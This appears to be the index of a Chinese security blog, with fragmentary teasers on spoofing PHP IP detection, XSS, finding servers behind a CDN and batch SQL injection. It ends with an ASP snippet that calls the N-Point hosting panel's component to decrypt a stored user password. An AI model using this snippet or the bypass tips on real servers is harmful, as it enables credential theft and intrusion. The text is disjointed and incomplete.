iick's blog

Author:Yaseng  &&Desperado

Team:CodePlay

Chinaz 下其源码   读之发现有万恶的 GetIp() 

//获取IP
function getip() { 
  if (getenv ( "HTTP_CLIENT_IP" )) {
   $httpip = getenv ( "HTTP_CLIENT_IP" );
...

一般发现一个xss漏洞后要做的基本上就是这些：

ping命令结合dos批处理能做很多事，对我等懒惰的系统管理员们尤其有用。

现在很多网站用了cdn技术，在做一些测试的时候，想获取其服务器真实IP地址就有点困难，不知道现在还有其他什么好的方法呢，整理了下，目前知道如下两种：
 
1：拿CDN服务器 找出真实IP
cache_peer 1.1.1.1 parent 80 0 no-query originserver
cache_peer_domain 1.1.1.1 

2：判断HTTP_X_FORWARDED_FOR是否为空，不为空把这个作为IP地址，否则取得REMOTE_ADDR作为IP地址。
...

D盾有多不爽我就不说了，现在都是批量注入，时不时的弹出D盾提示，甚是恼人

   其实这个并不是我发现的，而是国外的一个注入工具。某日本人心血来潮

想换一个linux系统玩玩儿，在互联网上逛了一大圈，发现大半都是带马的网站

N点虚拟主机加密方式是他自定义的函数,封装到了DLL里面

你在N点主机管理系统的目录新建一个ASP文件内容如下

<!--#include file="inc/conn.asp"--> <!--#include file="inc/siteinfo.asp"--> <!--#include file="inc/char.asp"--> <% set iishost=server.CreateObject("npoint.host") x=iishost.Eduserpassword("NLFPK@OJCOCLA@E@FEKJMFADLALKLF@JHOIMAHO@LCDBAAMEOEKGKM@A",0) response.write x %>